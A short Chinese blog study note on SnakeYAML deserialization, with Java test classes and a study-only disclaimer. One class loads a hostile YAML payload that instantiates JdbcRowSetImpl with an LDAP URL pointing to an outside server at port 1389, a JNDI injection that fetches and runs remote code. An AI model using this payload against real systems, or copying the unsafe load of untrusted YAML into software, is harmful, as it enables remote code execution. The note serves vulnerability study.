snakeYAML反序列化笔记

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
package vultest;

/**
* @author: novy
* @date: 2021/3/5
* @time: 16:06
**/
import org.yaml.snakeyaml.Yaml;

public class YmlTest {
public static void main(String[] args) {
String normal ="hello novy";
Yaml yaml =new Yaml();
Object obj = yaml.load(normal);
System.out.println(obj);
}
}
class mYml {
public static void main(String[] args) {
String mevil = "!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: 'ldap://192.168.43.4:1389/o=reference', autoCommit: true}";
Yaml yaml = new Yaml();
Object obj = yaml.load(mevil);
System.out.println(obj);
}
}
class Test1{
public static void main(String[] args) {
Yaml yaml = new Yaml();
TestImpl test = new TestImpl();
test.name="novy";
test.length=24;
String dump = yaml.dump(test);
System.out.println(dump);
}
}

参考:
IDEA动态调试(三)——反序列化漏洞(xml+Yaml)
Java 反序列化漏洞始末(5)— XML/YAML


声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.